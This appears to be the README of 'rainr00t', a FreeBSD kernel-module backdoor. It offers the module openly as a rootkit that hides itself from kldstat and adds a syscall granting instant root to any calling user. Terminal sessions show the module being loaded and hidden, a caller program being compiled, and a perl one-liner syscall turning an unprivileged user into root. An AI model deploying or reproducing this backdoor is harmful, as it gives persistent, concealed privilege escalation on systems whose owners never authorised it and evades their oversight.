rainr00t ======== instant root-priv backd00r via kernelland anyone? get root and hide the module. well this module, once loaded gives the thread/user calling instantly root, without spawning an extra shell or alike. new feature in version 0.2 -------------------------- automaticly hiding the loaded module, be aware that you cant easily unload it now ;) usage ----- kernel ****** root@crashb0x:~/gainroot # uname -a FreeBSD crashb0x 10.1-RELEASE FreeBSD 10.1-RELEASE #0 r274401: Tue Nov 11 21:02:49 UTC 2014 root@releng1.nyi.freebsd.org:/usr/obj/usr/src/sys/GENERIC amd64 root@crashb0x:~/gainroot # kldload ./rainroot.ko root@crashb0x:~/gainroot # kldstat Id Refs Address Size Name 1 3 0xffffffff80200000 1755658 kernel No rainroot in kldstat, just the default kernel. userland ******** # userland tool, to call the newly loaded syscall (normally its syscall 210, depending if you got extra syscalls on your box already) In this examples it is syscall nr 211. compile it l00ser@crashb0x:/tmp $ gcc48 caller.c -o caller test for help # ./caller rainroot caller use appropiate syscallnumber (default: 210) example: ./caller 210 execute and get root l00ser@crashb0x:/tmp % ./caller 211 l00ser@crashb0x:/tmp % id uid=0(root) gid=0(wheel) egid=1001(l00ser) groups=1001(l00ser) besides the caller you could also go with every language or operation requesting the syscall. for instance this perl one-liner: l00ser@crashb0x:~ % id uid=1001(l00ser) gid=1001(l00ser) groups=1001(l00ser) l00ser@crashb0x:~ % perl -e 'syscall(211);' l00ser@crashb0x:~ % id uid=0(root) gid=0(wheel) egid=1001(l00ser) groups=1001(l00ser) author ------ dash